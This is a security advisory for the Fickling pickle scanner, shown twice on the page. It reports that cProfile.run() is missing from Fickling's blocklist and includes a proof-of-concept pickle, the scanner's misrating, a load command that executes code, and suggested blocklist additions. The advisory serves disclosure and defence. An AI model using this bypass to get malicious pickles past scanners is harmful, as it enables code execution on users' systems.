Headline
GHSA-p523-jq9w-64x9: Fickling Blocklist Bypass: cProfile.run()
Fickling’s assessment
cProfile was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).
Original report
Description
Summary
Fickling versions up to and including 0.1.6 do not treat Python’s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.
If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.
This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.
Details
The cProfile module is missing from fickling’s block list of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).
Incriminated source code:
- File:
fickling/analysis.py - Class:
UnsafeImports - Issue: The blocklist does not include
cProfile,cProfile.run, orcProfile.runctx
Reference to similar fix:
- PR #187 added
ptyto the blocklist to fix CVE-2025-67748 - PR #108 documented the blocklist approach
- The same fix pattern should be applied for
cProfile
How the bypass works:
- Attacker creates a pickle using
cProfile.run()in__reduce__ cProfile.run()accepts a Python code string and executes it directly (C-accelerated version of profile.run)- Fickling’s
UnsafeImportsanalysis does not flagcProfileas dangerous - Only the
UnusedVariablesheuristic triggers, resulting in SUSPICIOUS severity - The pickle should be rated OVERTLY_MALICIOUS like
os.system,eval, andexec
Tested behavior (fickling 0.1.6):
| Function | Fickling Severity | RCE Capable |
|---|---|---|
| os.system | LIKELY_OVERTLY_MALICIOUS | Yes |
| eval | OVERTLY_MALICIOUS | Yes |
| exec | OVERTLY_MALICIOUS | Yes |
| cProfile.run | SUSPICIOUS | Yes ← BYPASS |
| cProfile.runctx | SUSPICIOUS | Yes ← BYPASS |
Suggested fix:
Add to the unsafe imports blocklist in fickling/analysis.py:
cProfilecProfile.runcProfile.runctx_lsprof(underlying C module)
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Environment:
- Python 3.13.2
- fickling 0.1.6 (latest version, installed via pip)
Step 1: Create malicious pickle
import pickle
import cProfile
class MaliciousPayload:
def __reduce__(self):
return (cProfile.run, ("print('CPROFILE_RCE_CONFIRMED')",))
with open("malicious.pkl", "wb") as f:
pickle.dump(MaliciousPayload(), f)
Step 2: Analyze with fickling
from fickling.fickle import Pickled
from fickling.analysis import check_safety
with open('malicious.pkl', 'rb') as f:
data = f.read()
pickled = Pickled.load(data)
result = check_safety(pickled)
print(f"Severity: {result.severity}")
print(f"Analysis: {result}")
Expected output (if properly detected):
Severity: Severity.OVERTLY_MALICIOUS
Actual output (bypass confirmed):
Severity: Severity.SUSPICIOUS
Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file
Step 3: Prove RCE by loading the pickle
python -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"
Output
CPROFILE_RCE_CONFIRMED
4 function calls in 0.000 seconds
Ordered by: standard name
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.000 0.000 0.000 0.000 <string>:1(<module>)
1 0.000 0.000 0.000 0.000 {built-in method builtins.exec}
1 0.000 0.000 0.000 0.000 {built-in method builtins.print}
1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}
Check: The code executes, proving RCE.
Pickle disassembly (evidence):
0: \x80 PROTO 5
2: \x95 FRAME 58
11: \x8c SHORT_BINUNICODE 'cProfile'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'run'
27: \x94 MEMOIZE (as 1)
28: \x93 STACK_GLOBAL
29: \x94 MEMOIZE (as 2)
30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')"
63: \x94 MEMOIZE (as 3)
64: \x85 TUPLE1
65: \x94 MEMOIZE (as 4)
66: R REDUCE
67: \x94 MEMOIZE (as 5)
68: . STOP
highest protocol among opcodes = 4
Impact
Vulnerability Type:
Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).
Who is impacted:
Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:
- ML model validation pipelines
- Model hosting platforms (Hugging Face, MLflow, etc.)
- Security scanning tools that use fickling
- CI/CD pipelines that validate pickle artifacts
Attack scenario:
An attacker uploads a malicious ML model or pickle file to a model repository. The victim’s pipeline uses fickling to scan uploads. Fickling rates the file as “SUSPICIOUS” (not “OVERTLY_MALICIOUS”), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.
Why cProfile.run() is dangerous:
Unlike runpy.run_path() which requires a file on disk, cProfile.run() takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that cProfile.run() takes "a single argument that can be passed to the exec() function".
cProfile is the C-accelerated version and is more commonly available than profile. It’s also the recommended profiler per Python docs (“cProfile is recommended for most users”), so it’s present in virtually all Python installations.
Severity: HIGH
- The attacker achieves arbitrary code execution
- The security control (fickling) is specifically designed to prevent this
- The bypass requires no special conditions beyond crafting the pickle with cProfile
- Attack is fully self-contained (no external files needed)
- cProfile is more commonly used than profile, increasing attack surface
Fickling’s assessment
cProfile was added to the list of unsafe imports (trailofbits/fickling@dc8ae12).
Original report****Description****Summary
Fickling versions up to and including 0.1.6 do not treat Python’s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.
If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.
This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.
Details
The cProfile module is missing from fickling’s block list of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).
Incriminated source code:
- File: fickling/analysis.py
- Class: UnsafeImports
- Issue: The blocklist does not include cProfile, cProfile.run, or cProfile.runctx
Reference to similar fix:
- PR #187 added pty to the blocklist to fix CVE-2025-67748
- PR #108 documented the blocklist approach
- The same fix pattern should be applied for cProfile
How the bypass works:
- Attacker creates a pickle using cProfile.run() in reduce
- cProfile.run() accepts a Python code string and executes it directly (C-accelerated version of profile.run)
- Fickling’s UnsafeImports analysis does not flag cProfile as dangerous
- Only the UnusedVariables heuristic triggers, resulting in SUSPICIOUS severity
- The pickle should be rated OVERTLY_MALICIOUS like os.system, eval, and exec
Tested behavior (fickling 0.1.6):
Function
Fickling Severity
RCE Capable
os.system
LIKELY_OVERTLY_MALICIOUS
Yes
eval
OVERTLY_MALICIOUS
Yes
exec
OVERTLY_MALICIOUS
Yes
cProfile.run
SUSPICIOUS
Yes ← BYPASS
cProfile.runctx
SUSPICIOUS
Yes ← BYPASS
Suggested fix:
Add to the unsafe imports blocklist in fickling/analysis.py:
- cProfile
- cProfile.run
- cProfile.runctx
- _lsprof (underlying C module)
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Environment:
- Python 3.13.2
- fickling 0.1.6 (latest version, installed via pip)
Step 1: Create malicious pickle
import pickle import cProfile
class MaliciousPayload: def __reduce__(self): return (cProfile.run, ("print(‘CPROFILE_RCE_CONFIRMED’)",))
with open("malicious.pkl", “wb”) as f: pickle.dump(MaliciousPayload(), f)
Step 2: Analyze with fickling
from fickling.fickle import Pickled from fickling.analysis import check_safety
with open('malicious.pkl’, ‘rb’) as f: data = f.read()
pickled = Pickled.load(data) result = check_safety(pickled) print(f"Severity: {result.severity}") print(f"Analysis: {result}")
Expected output (if properly detected):
Severity: Severity.OVERTLY_MALICIOUS
Actual output (bypass confirmed):
Severity: Severity.SUSPICIOUS
Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file
Step 3: Prove RCE by loading the pickle
python -c "import pickle; pickle.load(open('malicious.pkl’, ‘rb’))"
Output
CPROFILE_RCE_CONFIRMED
4 function calls in 0.000 seconds
Ordered by: standard name
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.000 0.000 0.000 0.000 <string>:1(<module>)
1 0.000 0.000 0.000 0.000 {built-in method builtins.exec}
1 0.000 0.000 0.000 0.000 {built-in method builtins.print}
1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}
Check: The code executes, proving RCE.
Pickle disassembly (evidence):
0: \x80 PROTO 5
2: \x95 FRAME 58
11: \x8c SHORT_BINUNICODE 'cProfile'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'run'
27: \x94 MEMOIZE (as 1)
28: \x93 STACK_GLOBAL
29: \x94 MEMOIZE (as 2)
30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')"
63: \x94 MEMOIZE (as 3)
64: \x85 TUPLE1
65: \x94 MEMOIZE (as 4)
66: R REDUCE
67: \x94 MEMOIZE (as 5)
68: . STOP
highest protocol among opcodes = 4
Impact
Vulnerability Type:
Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).
Who is impacted:
Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:
- ML model validation pipelines
- Model hosting platforms (Hugging Face, MLflow, etc.)
- Security scanning tools that use fickling
- CI/CD pipelines that validate pickle artifacts
Attack scenario:
An attacker uploads a malicious ML model or pickle file to a model repository. The victim’s pipeline uses fickling to scan uploads. Fickling rates the file as “SUSPICIOUS” (not “OVERTLY_MALICIOUS”), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.
Why cProfile.run() is dangerous:
Unlike runpy.run_path() which requires a file on disk, cProfile.run() takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that cProfile.run() takes "a single argument that can be passed to the exec() function".
cProfile is the C-accelerated version and is more commonly available than profile. It’s also the recommended profiler per Python docs (“cProfile is recommended for most users”), so it’s present in virtually all Python installations.
Severity: HIGH
- The attacker achieves arbitrary code execution
- The security control (fickling) is specifically designed to prevent this
- The bypass requires no special conditions beyond crafting the pickle with cProfile
- Attack is fully self-contained (no external files needed)
- cProfile is more commonly used than profile, increasing attack surface
References
- GHSA-565g-hwwr-4pp3
- GHSA-p523-jq9w-64x9
- GHSA-r7v6-mfhq-g3m2
- trailofbits/fickling#108
- trailofbits/fickling#187
- trailofbits/fickling#195
- trailofbits/fickling@dc8ae12
- https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L116